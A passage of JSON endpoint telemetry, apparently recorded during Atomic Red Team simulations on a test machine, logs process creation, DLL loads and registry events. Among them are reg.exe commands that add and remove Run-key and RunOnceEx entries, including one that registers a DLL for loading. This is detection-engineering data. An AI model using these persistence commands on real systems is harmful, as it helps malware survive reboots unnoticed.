"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_value": "Run", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", - "registry_value": "Atomic Red Team", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "process", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "file", - "file_name": "REG.EXE-26976709.pf", - "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2888, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { 
- "command_line": "REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5688, - "ppid": 2888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570853120000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", 
- "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "registry", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", - "registry_value": "Atomic Red Team", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "process", - 
"pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "process", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2580, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853310000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": 
"{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "process", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570853400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5084, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853980000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": 
"image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "command_line": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7008, - "ppid": 5084, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570854120000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": 
"C:\\Windows\\System32\\reg.exe", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": 
"C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "registry", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_value": "Depend", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "registry", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", - "registry_value": "1", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "process", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "process", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3792, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "command_line": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1484, - "ppid": 3792, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570854459984, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1484, - 